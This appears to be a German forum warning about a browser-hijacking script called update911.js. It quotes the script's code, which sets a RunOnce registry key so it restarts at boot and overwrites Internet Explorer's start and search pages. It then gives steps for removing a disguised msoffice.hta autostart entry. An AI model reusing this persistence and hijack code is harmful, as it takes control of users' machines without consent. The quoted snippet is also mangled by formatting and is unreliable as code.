Hi.
update911.js (der Monat/Tag/Jahr) September/11 ..Twin-Tower-Desaster.
(Porsche freut sich)
Bremst die Online-Verbindungen mächtig aus und
baut eine Verbindung zu bestimmten Rechnern auf,deren
Link ich hier rausgenommen habe....Vorsichtshalber
var fso = new ActiveXObject("Scripting.FileSystemObject&quo t
;
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";
var Shell = new ActiveXObject("WScript.Shell"
;
Shell.RegWrite("HKLM\\Software\\Microsoft\\Wi ndows\\CurrentVersion\\RunOnce\\tlc",filepath );
Shell.RegWrite("HKCU\\Software\\Microsoft\\In ternet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\In ternet Explorer\\Main\\Search Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\In ternet Explorer\\Main\\Search Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\In ternet Explorer\\Main\\Use Search Asst","no"
;
Shell.RegWrite("HKCU\\Software\\Microsoft\\In ternet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD"
;
Bitte prüfen,ob auf dem PC die folgende Datei vorhanden ist:
" C:\WINDOWS\FONTS\msoffice.hta "
... wenn ja, steht vermutlich auch der folgend Schlüssel in der registry:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\]
"Msoffice"="C:\\WINDOWS\\FONTS\\mso ffice.hta"
Der Aufruf muß, die Datei sollte entfernt werden.
Vorsichtshalber auch die Run-Schlüssel unter HKCU prüfen.)
Der Fehler entsteht durch ein Skript,das durch die Firewall und Spybot etc.
eine .dll rüberlädt und immer beim Start loslaufen läßt.
Aber so gut getarnt, dass wenige Programme die finden!
(auch Spybot S&D nicht)
Ein Programm geht und zwar "Security Task Manager"
Dieses macht alle aktiven Prozesse sichtbar und man weiß,was sich
im Hintergrund auf dem Rechner tut.
Zum Download HIER
Gruß
Knuffel